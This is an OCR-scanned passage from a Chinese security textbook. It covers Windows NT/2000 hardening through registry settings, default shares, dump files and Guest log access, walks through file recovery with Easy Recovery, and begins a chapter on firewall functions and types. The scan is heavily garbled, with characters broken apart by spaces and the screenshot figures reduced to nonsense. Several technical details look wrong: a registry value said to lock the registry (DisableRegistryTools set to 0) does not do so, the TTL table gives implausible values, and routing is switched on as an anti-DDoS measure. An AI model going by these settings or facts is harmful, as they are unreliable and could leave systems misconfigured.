在 弹出 的 界面 上 依次 选择 “计算 机 配置 ”|“ 管 理 模板 ”|“ 系 统 ”， 双 击 “ 关 闭 自 动 播放 ”， 
然后 在 弹出 的 “ 停 用 自动 播放 属性 ”对 话 框 中 选择 “已 启用 ”和 “所 有 驱动 器 ” 具体 操作 
过 程 如 图 9-13 所 示 。 


| 停 用 自动 著 放 尾 性 


9-13 ”关闭 自动 播放 的 步骤 


11. 安装 最 新 安全 补丁 

Windows NT 操作 系统 不 可 避免 地 存在 许多 安全 漏洞 ， 这 些 漏洞 被 公布 后 若 没有 及 时 
修补 将 很 快 被 攻击 者 视 为 攻击 目标 。 修 补 安全 漏洞 的 有 效 方法 是 启用 Windows NT 的 自动 
更 新 功能 ， 及 时 下 载 并 安装 最 新 的 安全 漏洞 补丁 程序 。 


9.6 ”操作 系统 高 级 安全 配置 措施 


操作 系统 高 级 安全 配置 措施 包括 14 条 配置 原则 : 关闭 DirectDraw、 关 闭 默认 共享 、 禁 
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用 Dump 文件 、 文 件 加 密 系统 、 加 密 Temp 文件 夹 、 锁 住 注册 表 、 关 机 时 清除 文件 、 禁 止 
软盘 或 光盘 启动 、 使 用 智能 卡 、 使 用 IPSec、 禁 止 判断 主机 类 型 、 抵 抗 DDoS、 禁 止 Guest 
访问 日 志和 数据 恢复 软件 。 

1. 关闭 DirectDraw 

C2 级 安全 标准 对 视频 卡 和 内 存 有 一 定 要 求 。 关 闭 DirectDraw 可 能 对 一 些 需 要 用 到 
DirectX 的 程序 有 影响 ， 但 是 对 于 绝 大 多 数 的 商业 站 点 是 没有 影响 的 。 设 置 注册 表 键 
HKEY LOCAL MACHINE\System\CurrentControlSet\Control\GraphicsDrivers\DCIN\Timeout 
的 值 为 0。 

2. 关闭 默认 共享 

Windows NT 安装 完成 以 后 ， 系 统 会 创建 一 些 隐藏 的 共享 ， 可 以 在 DOS 提示 符 下 输入 
Net Share 命令 查看 ， 如 图 9-14 所 示 。 


C:N\>net share 


图 9-14 查看 隐藏 的 默认 共享 
要 禁止 这 些 共享 ， 可 打开 “管理 工具 ”， 在 “计算 机 管理 ”对 话 框 中 打开 “共享 文件 
夹 ”， 选 择 “ 共 享 ”， 然后 ,在 相应 的 共享 文件 夹 上 右 击 ,选择 “停止 共享 ” 即 可 ， 如 图 9-15 
所 示 。 


Windows 


3 ADMIN$ CWWINNT 


计算 机 管理 (本 地 ) 
日 世系 纺 工 具 
事件 查看 器 
系统 信息 
性 能 日 志和 警报 
日 -多 共 享 文件 夹 

息 持 


鼎 辜 盘 玉 片 整理 程序 
有 逻辑 驱动 器 
丛 可 黎 动 存储 
他 服务 和 应 用 程序 


停止 共享 所 选 的 会 话 | | 


图 9-15 停止 默认 共享 


常见 的 共享 目录 及 它们 对 应 的 地 址 和 说 明 如 表 9-5 所 示 。 
表 9-5 共享 目录 及 其 功能 


默认 共享 目录 ” 路径 说 明 
C9$D9$ Ey 分 区 的 根 目录 Windows 2000 Advanced Server 版 中 ,只 有 Admini- 


strator 和 Backup Operators 组 成 员 才 可 连接 ， 
Windows 2000 Server 版 本 Server Operators 组 也 可 


以 连接 到 这 些 共享 目录 

ADMINS %SYSTEMROOT% 远程 管理 用 的 共享 目录 ， 它 的 路 径 永 远 都 指向 
Windows 2000 的 安装 路 径 

IPCS$ 卫 C$ 共 享 提供 了 登录 到 系统 的 能 力 

PRINTY SYSTEM32 下 SPOOL\DRIVERS ”用 户 远程 管理 打印 机 


3. 禁用 Dump 文件 

在 系统 崩溃 和 蓝屏 时 ，Dump 文件 是 一 份 很 有 用 资料 ， 可 以 帮助 查找 问题 。 然 而 ， 也 
能 给 黑客 提供 一 些 敏感 信息 ， 比 如 一 些 应 用 程序 的 密码 等 。 用 来 禁止 Dump 文件 ， 可 打开 
“控制 面板 ”选择 “系统 属性 ”的 “高 级 ”选项 卡 ， 并 选择 “启动 和 故障 恢复 ” 在 打开 的 
“启动 和 故障 恢复 ”对 话 框 中 ， 把 写 入 调试 信息 修改 成 “无 ” 如 图 9-16 所 示 。 

启动 和 故障 恢复 了 | x| 

一 系统 启动 
默认 操作 系统 @) : 


[icrosort Windows 2000 Advanced Server” /fastdetect 7| 
If 显示 操作 系统 列表 咽 ) [50 ” 习 秒 。 


三 系 统 失败 
万 | 交 事 件 写 系统 日 志 @ 
IY 发 送 管理 警报 还) 

JY 自动 重新 启动 &) 
写 入 调试 信息 


[ 气 ) 了 =] 


小 内 仔 转 铺 (64 三 ) 
核心 内 存 转 储 


车 全 内 位 守 情 


图 9-16 禁止 Dump 文件 的 产生 


4. 文件 加 密 系 统 

Windows 2000 强大 的 加 密 系 统 能 够 给 磁盘 、 文 件 夹 、 文 件 加 上 一 层 安全 保护 。 这 样 可 
以 防止 其 他 人 把 本 地 硬盘 挂 到 别 的 机 器 上 读 出 里 面 的 数据 。 

微软 公司 为 了 弥补 Windows NT 4.0 的 不 足 ， 在 Windows 2000 中 提供 了 一 种 基于 新 一 
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代 NIFS， 即 NTFS V5 的 加 密 文 件 系 统 (Encrypted File System，EFS)。EFS 实现 的 是 一 种 
基于 公共 密 钥 的 数据 加 密 方式 ， 使 用 了 Windows 2000 中 的 CryptoAPI 结构 。 

5， 加密 Temp 文件 夹 

一 些 实用 程序 在 安装 和 升级 时 ， 会 把 一 些 内 容 拷贝 到 Temp 文件 夹 ， 但 是 当 程序 升级 
完毕 或 关闭 时 ， 并 不 会 自动 清除 Temp 文件 夹 的 内 容 ， 所 以 ， 给 Temp 文件 夹 加 密 可 以 给 
文件 多 一 层 保护 。 

6. 锁 住 注册 表 

在 Windows 2000 中 ， 只 有 Administrators 和 Backup Operators 才 有 从 网 络 上 访问 注册 
表 的 权限 。 当 账号 的 密码 泄漏 以 后 ， 黑 客 也 可 以 在 远程 访问 注册 表 ， 当 服务 器 放 到 网 络 上 
时 ， 一 般 需 要 锁定 注册 表 。 修 改 Hkey_current user\Software\Microsoft\Windows\Current- 
version\Policies\System\DisableRegistryTools 的 值 改 为 0， 类 型 为 DWORD。 

7. 关机 时 清除 文件 

页 面 文件 也 就 是 调试 文件 ， 是 Windows 2000 用 来 存储 没有 装 入 内 存 的 程序 和 数据 文 
件 部 分 的 隐藏 文件 。 某 些 第 三 方 的 程序 可 以 把 一 些 没 有 加 密 的 密码 存在 内 存 中 ， 页 面 文件 
中 可 能 含有 另外 一 些 敏感 的 资料 ， 因 此 要 在 关机 的 时 候 清除 页 面 文件 。 这 可 以 修改 注册 表 
的 键 HKEY LOCAL MACHINE\System\CurrentControlSet\Control\SessionManager\Memory 
Management\ClearPageFileAtShutdown 的 值 为 1。 

8. 禁止 软盘 或 光盘 启动 

某 些 第 三 方 的 工具 能 够 通过 引导 系统 来 绕 过 原 有 的 安全 机 制 ， 比 如 ， 一 些 管理 员工 具 
从 软盘 上 或 者 光盘 上 引导 系统 以 后 ， 就 可 以 修改 硬盘 上 操作 系统 的 管理 员 密码 。 如 果 服 务 
器 对 安全 要 求 非常 高 ， 可 以 考虑 使 用 可 移动 软盘 和 光驱 。 

9. 使 用 智能 卡 

密码 总 是 使 安全 管理 员 进退 两 难 ， 如 果 密 码 太 简单 ， 容 易 受 到 一 些 工 具 的 攻击 ， 如 果 
密码 太 复杂 ， 用 户 为 了 记 住 密码 ， 会 把 密码 到 处 乱 写 。 因 此 如 果 条 件 允 许 ， 用 智能 卡 来 代 
替 复杂 的 密码 是 一 个 很 好 的 解决 办 法 。 

10. 使 用 IPSec 

正如 其 名 字 的 含义 ，IPSec 提供 下 数据 包 的 安全 性 。 它 提供 身份 验证 、 完 整 性 和 可 选 
择 的 机 密 性 。 发 送 端 计算 机 在 传输 之 前 加 密 数 据 ， 而 接收 端 计 算 机 在 收 到 数据 之 后 解密 数 
据 。 利 用 IPSec 可 以 使 系统 的 安全 性 能 大 大 增强 。 

11. 禁止 判断 主机 类 型 
黑客 利用 TTL 值 可 以 鉴别 操作 系统 的 类 型 ， 通 过 Ping 指令 能 判断 目标 主机 的 类 型 。 
表 9-6 给 出 了 一 些 常 见 操作 系统 的 TTL 对 照 值 。 


表 9-6 常用 操作 系统 的 TIL 值 


操作 系统 类 型 TIL 返回 值 操作 系统 类 型 ITIL 返回 值 
Windows 2000 128 Iix 240 
Windows NT 107 Aix 247 
Windows 9x 128 或 127 Linux 241 或 240 


Solaris 252 


通过 修改 注册 表 键 HKEY LOCAL MACHINE\System\CurrentControlSet\Services\ 
Tcpip\Parameters 的 值 进行 更 改 TTL 值 。 

12. 抵抗 DDoS 

添加 注册 表 的 一 些 键 值 ， 可 以 有 效 抵抗 DDoS 的 攻击 。 在 键 值 [HKEY LOCAL 
MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters] 下 增加 响应 的 键 及 其 说 明 ， 
如 表 9-7 所 示 。 


表 9-7 抵抗 DDoS 攻击 的 操作 系统 设置 
增加 的 键 值 键 值 说 明 
“EnablePMTUDiscovery”=dword:00000000 基本 设置 
“NoNameReleaseOnDemand”= dword:00000000 
“KeepAliveTime”= dword:00000000 
“PerformRouterDiscovery” = dword:00000000 


“EnableICMPRedirects”= dword:00000000 防止 ICMP 重 定向 报 文 的 攻击 
“SynAttackProtect” = dword:00000002 防止 SYN 洪水 攻击 
“TcpMaxHalfOpenRetried” = dword:00000080 在 设置 超出 范围 时 ， 保 护 机 制 才 会 采取 措施 
“TcpMaxHalfOpen” = dword:00000100 

“IGMPLevel” = dword:00000000 不 支持 IGMP 协议 

“EnableDeadGWDetect” = dword:00000000 禁止 死 网 关 监 测 技术 

“IPEnableRouter”= dword:00000001 支持 路 由 功能 


13. 禁止 Guest 访问 日 志 

在 默认 安装 的 Windows NT 和 Windows 2000 中 ，Guest 账号 和 匿名 用 户 可 以 查看 系统 
的 事件 日 志 ， 这 可 能 导致 许多 重要 信息 的 泄漏 ， 可 通过 修改 注册 表 来 禁止 Guest 访问 事件 
日 志 。 

1) 禁止 Guest 访问 应 用 日 志 

在 HKEY LOCAL MACHINE\System\CurrentControlSet\Services\Eventlog\Application 
下 添加 键 值 名 称 为 RestrictGuestAccess， 类 型 为 DWORD， 将 值 设置 为 1。 

2) 系统 日 志 

在 HKREY LOCAL MACHINE\System\CurrentControlSet\Services\Eventlog\System 下 添 
加 键 值 名 称 为 RestrictGuestAccess， 类 型 为 DWORD， 将 值 设 置 为 1。 

3) 安全 日 志 

在 HKEY LOCAL MACHINE\System\CurrentControlSet\Services\Eventlog\Security 下 
添加 键 值 名 称 为 RestrictGuestAccess， 类 型 为 DWORD， 将 值 设置 为 1。 

14. 数据 恢复 软件 

当 数 据 被 病毒 或 者 入 侵 者 破坏 后 ， 可 以 利用 数据 恢复 软件 找 回 部 分 被 删除 的 数据 ， 在 
恢复 软件 中 比较 著名 的 有 Easy Recovery。 该 软件 功能 强大 ， 可 以 恢复 被 误 删除 的 文件 、 丢 
失 的 硬盘 分 区 等 。 该 软件 的 主 界面 如 图 9-17 所 示 。 

例如 , 王 盘 上 有 一 些 数据 文件 ， 现 在 被 黑客 删除 了 ， 选 择 左边 栏目 “数据 恢复 ” 然后 
单 击 “高 级 恢复 ” 使 用 高 级 选项 来 自 定义 数据 恢复 ， 如 图 9-18 所 示 。 
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图 9-17 Easy Recovery 软件 主 界面 


La Ea N 一 | 
数据 恢复 


高 级 恢复 ”删除 恢复 


使 用 高 级 选项 来 
自 定义 数据 恢复 查找 并 恢复 已 删除 的 文件 


格式 化 恢复 原始 恢复 
从 已 格式 化 的 不 含 任何 文件 系统 
卷 中 恢复 文件 结构 信息 的 恢复 


继续 恢复 紧急 引导 盘 
续 已 保存 的 数 
he 创建 紧急 引导 盘 


图 9-18 选择 恢复 菜单 


进入 “高 级 恢复 ”对 话 框 后 ， 软 件 自动 扫描 出 目前 硬盘 分 区 的 情况 ， 分 区 信息 是 直接 


从 分 区 表 中 读 取 出 来 的 ， 如 图 9-19 所 示 。 


确认 您 想 要 恢复 数据 的 分 区 ， 选 择 分 区 并 单 击 “ 下 一 步 ” 开 始 扫 摘 文件 。 选 择 “ 取 消 ”退出 工具 . 


日 画 EE 
日 - 国 itachi HTS542518K9SADO (149.05 ( 
®B (6:\ NTFS (100.00 MB) 
加 [CN NIFS (49.90 68) 
BB 1D:\) NTFS (50.00 6B) 
DB EE:\) NIFS (49.05 GB) 


| 


选择 信息 


图 例 
FAT 12 MFAT16 国 了 AT 32 NIFS 
加 未 知 选 定 


图 9-19 ”硬盘 和 分 区 列表 


现在 选择 E 盘 ， 单 击 “ 下 一 步 ”按钮 ， 


确认 您 想 要 恢复 数据 的 分 区 ,选择 分 区 并 单 击 “ 下 一 步 ”开始 扫 摘 文件 。 选 择 “ 取 消 ” 退 出 工具 。 


日 思 向 8 由 脑 
日 -图 Hitachi ]TS542516K9SA00 (149.05 ¢ 
BB (6:\) NIFS (100.00 MB) 
BB C:\) NIFS (49.90 6B) 
BB 0:N) NTFS (50.00 GB) 
CE:\) NIFS (4 9] 


如 图 9-20 所 示 。 


选择 信息 

起 始 扇 区 : 209717248 
结束 扇 区 : 312578047 
入 大 小 : 4.00 到 

卷 大 小 : 49.05 6B 


4| 用 [Ir 


FAT 12 MFAT16 BFAT32 NFS 
下 未 知 这 定 
高 级 选项 。 | ”查看 。 | 。 重新 扫 换 系统 


图 9-20 选择 要 恢复 文件 所 在 的 硬盘 
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软件 开始 自动 扫描 该 盘 上 曾经 有 哪些 被 删除 的 文件 ， 根 据 硬盘 的 大 小 ， 扫 描 一 般 需 要 
比较 长 的 时 间 ， 如 图 9-21 所 示 。 


上 次 文件 : 2tae4lte. dll 


BFAT12 MFAT1S MFAT32 @ NTFS 
加 未 知 选 定 


| 。 坦 看 | 重新 扫 桨 系统 


图 9-21 扫描 硬盘 
扫描 完成 以 后 ， 将 该 盘 上 所 有 的 文件 及 文件 夹 显示 出 来 ， 包 括 曾 经 被 删除 的 文件 和 文 
件 夹 ， 如 图 9-22 所 示 。 


器 鲍 SRECYCLE.BIN 
口 息 360Rec 
侣 和 岛 LOSTFILE 
口 鲍 Media 
器 鲍 Program Files 


4[ 几 中 


BB 0 个 文件 , 共 0 亨 二 属 寺 0 个 文件 , 共 0 字 车 
颜色 图 例 一 一 一 厂 使 用 过 港 器 0D)。。 过 浇 器 选项 (O) | 。 壹 找 ( 昌 ”| 查看 文件 W | 
加 已 加 密 ”时 已 压缩 


下 - 步 


图 9-22 文件 列表 


选中 茶 个 文件 夹 或 者 文件 前 面 的 复 选 框 ， 然 后 单 击 “ 下 一 步 ”按钮 ， 就 可 以 恢复 被 删 
除 的 文件 或 文件 来 了 ， 如 图 9-23 所 示 。 


选中 您 起 要 恢复 的 文件 , 选择 “下 一 步 ” 继 续 到 “目的 地 选择 ”屏幕 。 选择“ 后 退 ” 返 回 和 到 “分 区 选择 ” 屏 
幕 .选择 “取消 ”退出 工具 。 


5.01 MB 11/19/2010 

4.05 MB 11/19/2010 

4.21 MB 11/19/2010 

4.18 MB 11/19/2010 
4.05 MB 4/29/2008 国 


a + 


< La oe EE i EE EE 
已 标 i 1 个 文件 , 共 4.05 MB | 显示 36 个 文件 , 共 142.92 MB 


[ea aaa | 太 使 用 过 滤器 山 。。 过 污 器 选项 (O) | 。 查找 ( 虽 。 | 坦 看 文件 JW | 


un enn es 
图 9-23 ”选中 要 恢复 的 文件 
在 恢复 的 对 话 框 中 选择 一 个 本 地 文件 夹 ， 将 文件 保存 到 该 文件 夹 中 ， 如 图 9-24 所 示 。 


选取 一 个 将 复制 数据 的 目的 地 。 选 择 “ 下 一 步 ”开始 复制 文件 。 选 择 “ 后 退 ” 返 回 到 “标记 文件 恢复 ” 屏 
募 . 选择 “ 妈 消 ” 训 出 T 具 - 
恢复 统计 一 一 一 一 一 一 一 一 一 一 
文件 : 1 
总 共 大 4.05 上 


三 恢复 目的 地 选项 


:AUsersvkdninistrator\Desktop\ 浏览 
估计 空闲 空间 : 23. 96 GB 高 级 


「 报告 
JY 生成 恢复 报告 


[C:\Users\Administrator\Desktop\report. txt 浏览 


图 9-24 恢复 文件 到 本 地 文件 夹 
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选择 一 个 文件 夹 后 ， 单 击 “ 下 一 步 ”按钮 ， 出 现 恢复 的 进度 对 话 框 ， 如 图 9-25 所 示 。 


习 当前 文件 : 下 一 个 天 高 . mp3 
已 用 时 间 : 3 种 
剩余 时 间 : 


已 恢复 1 / 1 个 文件 
已 恢复 4.05 妥 7 4.05 IB 


wx 


图 9-25 ”进度 对 话 框 
最 后 出 现 恢复 文件 的 总 结 报告 ， 如 图 9-26 所 示 。 


选择 “打印 ”来 打印 恢复 摘要 ,选择 “保存 ”来 将 恢复 摘要 保存 到 文件 中 。 选 择 “后 退 ” 返 回 到 “复制 目 
的 ”屏幕 ， 或 选择 “完成 ”退出 工具 。 


track 了 asyRecoyery - 高 级 恢复 
版 权 所 有 (ec) 2000-2009 Kroll Ontrack Inc. 
报告 创建 于 10/30/2011 @ 1:15 PN 


源 驱动 器 : Hi tachi HTS542516K9SADO 
源 分 区 : E:\ 《娱乐 > 

要 恢复 1 个 选 定 的 文件 。 

要 恢复 4.05 MB 数据 。 


已 恢复 到 C:\Vsers\Administrator\Desktop\。 


‘un ei ei er 


图 9-26 总 结 报告 对 话 框 


思考 与 练习 


1. 简 述 操作 系统 账号 密码 的 重要 性 以 及 有 几 种 方法 可 以 保护 密码 不 被 破解 或 者 盗 取 。 


2. 简 述 审核 策略 、 密 码 策略 和 账户 策略 的 含义 以 及 这 些 策略 如 何 保护 操作 系统 不 被 
入 侵 。 


3. 如 何 关闭 不 必要 的 端口 和 服务 ? 
4. 如 何不 显示 上 次 登录 名 ? 


第 10 章 防火 墙 技术 


本 章 学 习 目 标 : 

。 理解 防火 墙 的 功能 ; 

了 解 防火 墙 的 局 限 性 ; 
掌握 防火 墙 的 体系 结构 ; 
掌握 ASPF 配置 技术 ; 

了 解 防火 墙 的 发 展 趋势 。 


10.1 防火 墙 概述 


防火 墙 是 由 软件 和 硬件 组 成 的 系统 ， 它 处 于 安全 的 网 络 (通常 是 内 部 局 域 网 ) 和 不 安 
全 的 网 络 (通常 是 Intemet， 但 不 局 限于 Intemet) 之 间 ， 根 据 由 系统 管理 员 设 置 的 访问 控 
制 规 则 ， 对 数据 流 进行 过 滤 。 

由 于 防火 墙 置 于 两 个 网 络 之 间 ， 因 此 从 一 个 网 络 到 另 一 个 网 络 的 所 有 数据 流 都 要 流 经 
防火 墙 ， 根 据 安全 策略 ， 防 火 墙 对 数据 流 的 处 理 方式 有 三 种 : 四 允许 数据 流通 过 ;人 @) 拒 绝 
数据 流通 过 ; @ 将 这 些 数 据 流 丢弃 。 当 数据 流 被 拒绝 时 , 防火墙 要 向 发 送 者 回复 一 条 消息 ， 
提示 发 送 者 该 数据 流 已 被 拒绝 。 当 数据 流 被 丢弃 时 ， 防 火 墙 不 会 对 这 些 数据 包 进行 任何 处 
理 ， 也 不 会 向 发 送 者 发 送 任何 提示 信息 。 

一 般 来 说 ， 防 火 墙 由 儿 个 部 分 构成 。 在 图 10-1 中 ,“ 过 滤器 ”用 来 阻 断 某 些 类 型 的 数 
据 传 输 。 网 关 则 由 一 台 或 几 台 机 器 构成 ， 用 来 提供 中 继 服务 ， 以 补偿 过 滤器 带 来 的 影响 。 
把 网 关 所 在 的 网 络 称 做 “ 非 军事 区 ”(Demilitarized Zone，DMZ)。DMZ 中 的 网 关 有 时 会 得 
到 内 部 网 的 支援 。 通常 ， 网 关 通 过 内 部 过 滤 与 其 他 内 部 主机 进行 开放 的 通信 。 在 实际 情况 
下 ， 不 是 省 略 了 过 滤器 就 是 省 略 了 网 关 ， 具 体 情 况 因 防 火 墙 的 不 同 而 异 。 一 般 来 说 ， 外 部 
过 滤器 用 来 保护 网 关 免 受 侵害 ， 而 内 部 过 滤器 用 来 防备 因 网 关 被 攻破 而 造成 恶果 。 单 个 或 
两 个 网 关 都 能 够 保护 内 部 网 络 免 遭 攻击 。 通 常 把 暴露 在 外 的 网 关 主机 称 做 堡 又 主机。 目前 
市 场 上 常见 的 防火 墙 有 三 个 或 三 个 以 上 的 接口 ， 同 时 发 挥 了 两 个 过 滤器 和 网 关 的 功能 ， 通 
常 不 同 的 接口 实现 DMZ 区 和 内 部 网 络 的 划分 。 从 某 种 角度 看 ， 这 种 方式 使 防火 墙 的 管理 
和 维护 更 加 方便 ， 但 是 一 旦 防火 墙 受 到 攻击 ，DMZ 和 内 部 网 络 的 安全 性 同时 失去 保障 。 所 
以 安全 性 和 易 用 性 往往 相互 矛盾 ， 关 键 在 于 使 用 者 的 取舍 。 

实质 上 ， 防 火 墙 就 是 一 种 能 够 限制 网 络 访问 的 设备 或 软件 。 现 在 ， 许 多 设备 中 均 含 有 
简单 的 防火 墙 功 能 ， 如 路 由 器 、 调 制 解 调 器 、 无 线 基站 、 卫 交换 机 等 。 许 多 流行 的 操作 系 
统 中 也 含有 软件 防火 墙 。 
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(有关 人) 
188 内 部 网 络 -4 外 部 网 络 


图 10-1 防火 墙 示 意图 


10.2 防火墙 的 功能 


防火 墙 位 于 网 络 的 边界 ， 因 此 ， 它 被 认为 是 边界 安全 。 如 果 在 网 络 边界 没有 安装 防火 
墙 ， 为 保证 网 络 的 安全 ， 计 算 机 必须 自己 执行 防火 墙 功能 。 目 前 防火 墙 功能 主要 有 以 下 
5 种: 

(1) 包 过 滤 功 能 ; 

(2) 网 络 地 址 转换 ; 

(3) 代理 服务 功能 ; 

(4) 加 密 身份 认证 ; 

(5) 加 密 隧道 。 
10.2.1 包 过 滤 功 能 

防火 墙 的 包 过 滤 功 能 是 指 过 滤 掉 从 未 授权 的 主机 发 送 的 TCP/IP 数据 包 ， 并 拒绝 接受 
未 授权 服务 的 连接 请 求 。 包 过 滤 通 过 将 网 络 协议 与 一 个 规则 数据 库 进行 比较 ， 只 有 在 与 规 
则 数据 库 中 允许 通过 的 规则 相互 匹配 时 才 允 许 其 通过 ， 否 则 将 丢弃 这 些 包 。 它 通常 可 以 在 
路 由 器 中 实现 也 可 以 在 专用 的 过 滤器 中 实现 ， 如 图 10-2 所 示 。 防 火 墙 中 通常 使 用 两 种 类 型 
的 包 过 滤器 。 


各 一 
把 一 
和 一 
SC— 


(1) 状态 检查 的 包 过 滤器 : 复杂 的 过 滤器 使 用 专门 的 算法 检查 所 有 通过 它们 的 那些 连 
接 状 态 。 这 种 过 滤器 称 为 状态 检查 的 包 过 滤器 。 

(2) 无 状态 检查 的 包 过 滤器 : 无 状态 检查 的 包 过 滤器 仅 检查 每 个 包 的 包头 部 分 的 信息 
来 决定 是 否 让 包 通 过 ， 它 们 不 检查 包 的 数据 部 分 ， 也 不 维持 连接 状态 。 


冰 司 悦 站 于 
茧 关 吾 就 几 应 


单独 使 用 包 过 滤器 还 不 足以 真正 保证 网 络 的 安全 ， 它 通常 要 和 代理 服务 一 起 使 用 。 
10.2.2 ”网 络 地 址 转换 


防火 墙 的 网 络 地 址 转换 功能 是 指 将 内 部 主机 的 人 P 地 址 转换 为 某 一 固定 或 者 某 范 围 内 
的 某 个 IP 地 址 ， 而 使 从 网 络 外 部 无 法 探测 到 它们 。 网 络 地 址 转换 (Network Address 
Translation，NAT)， 有 时 也 称 为 IP 伪装。 网络 地 址 转换 通过 隐藏 内 部 主机 的 地 址 方式 来 保 
护 主机 的 安全 。 它 将 所 有 的 内 部 主机 转化 为 防火 墙 的 地 址 ， 对 因特网 来 说 所 有 的 内 部 网 中 
主机 的 对 外 传输 好 像 都 是 从 一 台 计 算 机 发 出 的 (防火 墙 主机 的 地 址 )。 网 络 地 址 转换 同时 可 
以 让 整个 内 部 网 络 对 外 复 用 一 个 IP 地 址 ， 这 就 意味 着 不 必 再 从 InterNIC 那里 申请 一 个 大 
的 地 址 块 了 。 而 内 部 网 络 的 地 址 分 配 可 以 根据 自己 的 需要 任意 进行 ， 不 必 担 心 和 其 他 网 络 
的 地 址 冲突 的 问题 。 表 10-1 中 给 出 了 常见 的 地 址 转换 类 型 。 


表 10-1 地 址 转换 类 型 


序号 名称 作用 

| 静态 地 址 转换 。 将 一 个 不 变 的 转换 地 址 分 配给 一 个 内 部 服务 器 

2 动态 地 址 转换 。 通常 意义 上 的 地 址 转换 

3 负载 平衡 转换 。 对 外 将 一 个 下 地 址 和 端口 转换 为 同等 配置 的 多 个 内 部 服务 器 的 集中 处 
4 网 络 宛 余 转换 ”将 多 个 ntemet 连接 集中 管理 ， 平 均 分 配 用 户 的 负载 


要 注意 的 是 ， 并 不 是 所 有 的 防火 墙 都 提供 地 址 转换 的 功能 ， 而 且 在 用 户 必须 使 用 某 些 
协议 时 不 能 使 用 地 址 转换 功能 。 
10.2.3 代理 服务 功能 

代理 服务 功能 指 防火 墙 代表 内 部 主机 进行 高 层 应 用 的 连接 ， 完 全 中 断 内 部 主机 与 外 章 
主机 的 网 络 层 的 连接 〈 如 图 10-3 所 示 )。 有 具体 来 说 ， 防 火 墙 的 代理 功能 包括 以 下 几 点 。 


(1) 代理 有 效 地 隐藏 了 内 部 网 络 用 户 。 包 过 滤 只 能 检查 数据 的 包头 部 分 ， 而 不 对 数据 
的 内 容 部 分 进行 检查 ， 因 此 不 能 完全 约束 通过 防火 墙 的 数据 流 ， 而 应 用 级 代理 很 好 地 解决 


了 这 个 问题 。 它 完全 断 开 了 通过 防火 墙 的 网 络 协议 数据 流 ， 并 将 网 络 通信 仅 限 于 用 户 规定 
允许 的 协议 如 HITP、FTP 和 SMTP。 它 允许 内 部 用 户 的 出 站 连接 请 求 ， 然 后 根据 定义 的 
规则 重新 产生 对 外 部 网 络 的 高 级 服务 请 求 ， 当 请 求 的 数据 返回 时 ， 再 把 数据 传送 给 客户 。 
和 ss 
| | 截断 、 检 查 并 
局 重新 产生 请 求 | 一 一 一 
多 - 域 | 站 | 
一 网 | . 
一 由 | 上 -| 过 湾内 容 ,并 
| | 返回 给 用 户 
= [| 公共 服务 器 
一 一 请 求 
一 ----- 响应 
图 10-3 ”代理 服务 


历 允 柱 到 天 
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(2) 代理 的 另 一 个 作用 是 可 以 缓存 内 部 网 络 用 户 重复 访问 的 Web 页 面 ， 这 可 以 加 快 访 
问 这 些 重复 的 数据 ， 并 减少 了 网 络 流量 。 

(3) 与 网 络 地 址 转换 不 同 ， 代 理 不 是 通用 的 ， 不 同 的 协议 服务 需要 不 同 的 代理 支持 。 
不 能 使 用 代理 服务 的 协议 不 能 通过 代理 进行 连接 。 
10.2.4 加 密 身 份 认 证 


加 密 身 份 认 证 是 指 专用 网 络 为 使 用 公共 网 络 的 用 户 访问 其 内 容 而 进行 的 证 实 其 身份 
的 过 程 。 加 密 身 份 认证 可 以 使 用 任何 安全 的 身份 认证 协议 ， 它 分 为 

(1) 登录 时 的 身份 认证 。 

(2) 数字 签名 和 数字 凭证 。 

一 旦 证 实 了 用 户 的 身份 ， 所 有 的 软件 都 可 以 无 障碍 地 运行 ， 不 需要 使 用 其 他 特殊 的 软 
件 包 的 支持 。 从 某 种 意义 上 讲 ， 加 密 的 身份 认证 降低 了 防火 墙 的 安全 性 。 


10.2.5 加密 隧道 


利用 公共 网 络 在 两 个 专用 网 络 之 间 建 立 一 个 安全 连接 。 通 道 技术 通常 也 称 为 虚拟 专用 
网 技术 VPN (Virtual Private Networking)。 加 密 通 道 通过 将 局 域 网 通信 封装 在 一 个 全 包 的 
方法 使 用 因特网 从 一 个 专用 网 络 连接 到 其 他 网 络 。 这 个 局 域 网 的 包 对 于 中 间 介 质 的 因特网 
上 的 计算 机 来 讲 是 不 可 读 的 。 加 密 通 道 通过 使 用 卫 封装 、 加 密 的 身份 认证 、 数 据 有 效 负载 
的 加 密 这 几 个 基本 的 安全 功能 部 件 进行 工作 。 
10.2.6 ”防火墙 功能 的 局 限 性 


防火 墙 技术 是 内 部 网 络 最 重要 的 安全 技术 之 一 ， 但 防火 墙 也 有 其 明显 的 局 限 性 。 

(1) 对 于 绕 开 了 防火 墙 的 攻击 行为 ， 防 火 墙 不 能 提供 保护 。 例 如 ， 内 部 主机 可 以 通过 
拨号 连接 互联 网 业务 提供 商 ISP 的 网 络 ， 局 域 网 LAN 内 部 可 能 配置 了 一 个 调制 解 调 器 池 ， 
为 出 差 的 雇员 和 在 家 中 通过 网 络 远程 上 班 的 雇员 服务 。 这 些 都 形成 了 内 网 与 外 网 的 多 个 接 
口 ， 从 而 绕 开 了 防火 墙 的 控制 。 

(2) 防火 墙 对 来 自 内 部 的 威胁 不 能 提供 保护 。 例 如 ， 一 个 心怀 不 轨 的 雇员 在 网 络 内 部 
进行 的 攻击 。 

(3) 防火 墙 不 能 对 那些 已 经 受到 病毒 感染 的 程序 和 文件 的 传输 提供 保护 。 因 为 在 局 域 
网 内 支持 各 种 操作 系统 和 应 用 ， 要 求 防火 墙 对 所 有 进入 的 文件 、 邮 件 和 信息 进行 病毒 扫描 
是 不 现实 的 和 不 可 能 的 。 


10.3 ”防火 墙 的 发 展 和 类 型 
10.3.1 防火 墙 的 发 展 


防火 墙 从 诞生 至 今 ， 经 过 了 好 几 代 的 发 展 ， 现 在 的 防火 墙 已 经 与 最 初 的 防火 墙 大 不 相 


同 了 。 最 初 的 防火 墙 依附 于 路 由 器 ， 它 只 是 路 由 器 中 的 一 个 过 滤 块 。 后 来 ， 随 着 过 滤 功 能 
的 完善 和 过 滤 浓度 的 增加 ， 防 火 墙 逐步 从 路 由 器 中 分 离 出 来 ， 成 为 一 个 独立 的 设备 。 
迄今 ， 防 火 墙 的 发 展 经 历 了 近 30 年 的 时 间 。 第 一 代 防 火 墙 始 于 1985 年 前 后 ， 它 几乎 
与 路 由 器 同时 出 现 ， 由 Cisco 的 IOS 软件 公司 研制 。 这 一 代 防 火 墙 称 为 包 过 滤 防 火 墙 。 直 
